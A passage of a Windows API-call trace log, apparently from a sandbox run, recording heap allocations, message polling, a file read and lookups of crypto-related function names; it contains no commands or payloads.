Size=0x8) returned 0x43e28f0 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.652] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0116.653] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0116.653] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0116.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0116.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.653] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0116.656] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0116.656] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0xbb73, lpOverlapped=0x0) returned 1 [0116.658] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0116.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbb73) returned 0x4516010 [0116.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0116.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0116.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbb73) returned 0x4521b90 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.663] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbb73) returned 0x4516010 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.664] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.664] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0116.664] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbb73) returned 0x4516010 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2750 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xbb73) returned 0x452d710 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0116.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0116.666] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0116.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0116.666] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.667] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0350 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d02b0 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0116.668] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03a0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0580 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.668] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0116.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0580 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.669] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0328 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0378 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0116.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0116.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0116.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0116.670] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0116.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0116.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0116.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0116.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 